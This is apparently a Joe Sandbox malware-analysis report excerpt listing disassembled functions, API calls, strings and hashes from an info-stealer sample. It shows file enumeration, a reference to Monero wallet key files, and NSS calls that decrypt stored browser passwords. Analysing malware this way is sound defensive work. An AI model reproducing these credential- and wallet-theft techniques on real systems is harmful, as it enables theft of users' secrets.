memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CB3E432
memcpy.VCRUNTIME140(?,?,?), ref: 6CB3E472

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 987c463e6893844578d3670cfae3702084bacedb71e174ed4b35a85388ef59c5
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 9F33AF71E0426ACFCB04CFA8C8806EDBBF2FF49310F198269D959AB755D731A945CB90

Function 00AC4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AC4580
RtlAllocateHeap.NTDLL(00000000), ref: 00AC4587
wsprintfA.USER32 ref: 00AC45A6
FindFirstFileA.KERNEL32(?,?), ref: 00AC45BD
StrCmpCA.SHLWAPI(?,00AD0FC4), ref: 00AC45EB
StrCmpCA.SHLWAPI(?,00AD0FC8), ref: 00AC4601
FindNextFileA.KERNEL32(000000FF,?), ref: 00AC468B
FindClose.KERNEL32(000000FF), ref: 00AC46A0
lstrcat.KERNEL32(?,005EFA80), ref: 00AC46C5
lstrcat.KERNEL32(?,005EE1C8), ref: 00AC46D8
lstrlen.KERNEL32(?), ref: 00AC46E5
lstrlen.KERNEL32(?), ref: 00AC46F6

Strings

%s\*, xrefs: 00AC459A
%s\%s, xrefs: 00AC461B

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 6922409ef3a292e2d42f821844cddac9d92cfff3aefcc8878ab45dad42c63e95
Instruction ID: 4fd5d46c065f386627125c88e18438a70d5dc2450c1818f3d7da3bf3e4ffa519
Opcode Fuzzy Hash: 6922409ef3a292e2d42f821844cddac9d92cfff3aefcc8878ab45dad42c63e95
Instruction Fuzzy Hash: 175153B2900218ABC724EB70DD99FFDB37CBB58700F404589B60D96190EB759B84CFA6

Function 00ABED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00ABED3E
FindFirstFileA.KERNEL32(?,?), ref: 00ABED55
StrCmpCA.SHLWAPI(?,00AD1538), ref: 00ABEDAB
StrCmpCA.SHLWAPI(?,00AD153C), ref: 00ABEDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 00ABF2AE
FindClose.KERNEL32(000000FF), ref: 00ABF2C3

Strings

%s\*.*, xrefs: 00ABED32

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 363302ff194b3cfb973fdd9ddf115bdbe0cc6956f61a866dc57797b8d68cd4d4
Instruction ID: 3ee0e1e1c1c44f686f7294d38ef258e5078dcc28115d4ee3855dd3c3f306e5b7
Opcode Fuzzy Hash: 363302ff194b3cfb973fdd9ddf115bdbe0cc6956f61a866dc57797b8d68cd4d4
Instruction Fuzzy Hash: 52E19C7291111CABEB54EB60DD56FFE7338AF64304F41459DB50AA2092EE306F8ACF52

Function 6CAFD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CB5E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD4F2
LeaveCriticalSection.KERNEL32(6CB5E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD50B

Part of subcall function 6CADCFE0: EnterCriticalSection.KERNEL32(6CB5E784), ref: 6CADCFF6
Part of subcall function 6CADCFE0: LeaveCriticalSection.KERNEL32(6CB5E784), ref: 6CADD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD52E
EnterCriticalSection.KERNEL32(6CB5E7DC), ref: 6CAFD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CAFD6A6
LeaveCriticalSection.KERNEL32(6CB5E7DC), ref: 6CAFD712
LeaveCriticalSection.KERNEL32(6CB5E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CAFD7EA

Strings

<jemalloc>, xrefs: 6CAFD827
: (malloc) Error initializing arena, xrefs: 6CAFD82C

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: eef1126e761afe82cd2f3cdc1c584c17e1510cf087f633f256a4a12042bfa0db
Instruction ID: 2cbf027aff4a9a122d7ccb22bc8963141fabacfb2969340c9c03b60dfc56b429
Opcode Fuzzy Hash: eef1126e761afe82cd2f3cdc1c584c17e1510cf087f633f256a4a12042bfa0db
Instruction Fuzzy Hash: EA91D371E047818FD756CF28C09076EB7E1EB89314F58492EE56ACBB80D734E885CB82

Function 00E7A836 Relevance: 15.5, Strings: 11, Instructions: 1715COMMON

Download Yara Rule

Strings

@N;_, xrefs: 00E7B6AF
6~s, xrefs: 00E7B9FA
UF?r, xrefs: 00E7A860
u;X0, xrefs: 00E7B3E0
(}/, xrefs: 00E7AA3D
>UXv, xrefs: 00E7AAF8
9cY, xrefs: 00E7ACBD
]Dn}, xrefs: 00E7B79B
E?, xrefs: 00E7B0DB
9_V, xrefs: 00E7B129
%;, xrefs: 00E7B3EB

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: (}/$6~s$9cY$>UXv$@N;_$UF?r$]Dn}$u;X0$%;$9_V$E?
API String ID: 0-785386069
Opcode ID: b91f11dd01ad022ab54e15150f1151224aa263ea77e5a2983657f7375c7784df
Instruction ID: a4c8b039e8a269d1dcdfd87e1ba98a38d2f0cbc4006cde1f0dacaf3b3d47492e
Opcode Fuzzy Hash: b91f11dd01ad022ab54e15150f1151224aa263ea77e5a2983657f7375c7784df
Instruction Fuzzy Hash: 38B23CF3A082049FE304AE2DEC8567AF7D9EFD4720F1A863DEAC4D7744E53598018696

Function 00ABDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00AD0C2E), ref: 00ABDE5E
StrCmpCA.SHLWAPI(?,00AD14C8), ref: 00ABDEAE
StrCmpCA.SHLWAPI(?,00AD14CC), ref: 00ABDEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 00ABE3E0
FindClose.KERNEL32(000000FF), ref: 00ABE3F2

Strings

\*.*, xrefs: 00ABDE26

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: ac13c42d6a2db53d6a0a0e84d7c7de994f72b4ee335391f5997236f4e563c8f9
Instruction ID: 63f97ea9c5f76403028be341e0599e8f580d038de32b38d997ca0b096aa88699
Opcode Fuzzy Hash: ac13c42d6a2db53d6a0a0e84d7c7de994f72b4ee335391f5997236f4e563c8f9
Instruction Fuzzy Hash: A4F1797191011C9BDB25EB60DD96FFE7338BF64304F81459EA40A62091EE306F8ACF66

Function 00ABC820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ABC871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ABC87C
PK11_GetInternalKeySlot.NSS3 ref: 00ABC88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00ABC8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00ABC8EB
lstrcat.KERNEL32(?,00AD0B46), ref: 00ABC943
lstrcat.KERNEL32(?,00AD0B47), ref: 00ABC957
PK11_FreeSlot.NSS3(?), ref: 00ABC961
lstrcat.KERNEL32(?,00AD0B4E), ref: 00ABC978

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 519f442aaddb87eb48ca810d2ef67b6c8c2138d0ab32671b791fbb57b817b752
Instruction ID: 1f5995f7e45f8d3d024443860366415676e4d0e1e6951c05ea9650d9165a87da
Opcode Fuzzy Hash: 519f442aaddb87eb48ca810d2ef67b6c8c2138d0ab32671b791fbb57b817b752
Instruction Fuzzy Hash: B9417EB490421ADBDB10DFA4DD89FFEF7B8BB48304F1045A9F509A6280D7709A84CF92

Function 00E78D7F Relevance: 12.9, Strings: 9, Instructions: 1632COMMON

Download Yara Rule

Strings

~|, xrefs: 00E78E5F
Oo, xrefs: 00E78EE3
?8w~, xrefs: 00E7A10C
^;_M, xrefs: 00E7975B
H?f, xrefs: 00E7917C
aJ), xrefs: 00E79378
&w?, xrefs: 00E7906A
tMvz, xrefs: 00E79217
~|, xrefs: 00E78E76

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ~|$~|$&w?$?8w~$^;_M$aJ)$tMvz$H?f$Oo
API String ID: 0-3939229316
Opcode ID: b408a9c9064d40de8b0f2c3362091d25841594bf03f9c0898c660adc6ab786b6
Instruction ID: 79811f9db58bdd185352dd8a7890786a56df246d1b135352bffcf80750ccdc35
Opcode Fuzzy Hash: b408a9c9064d40de8b0f2c3362091d25841594bf03f9c0898c660adc6ab786b6
Instruction Fuzzy Hash: E2B208F3A0C6009FE304AE2DDC8567AFBE9EF94720F1A853DEAC5C3744E93558058696

Function 6CB22C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CB22C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CB22C61

Part of subcall function 6CAD4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CAD4E5A
Part of subcall function 6CAD4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CAD4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB22C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CB22E2D

Part of subcall function 6CAE81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CAE81DE

Strings

ProfileBuffer parse error: %s, xrefs: 6CB22E3B
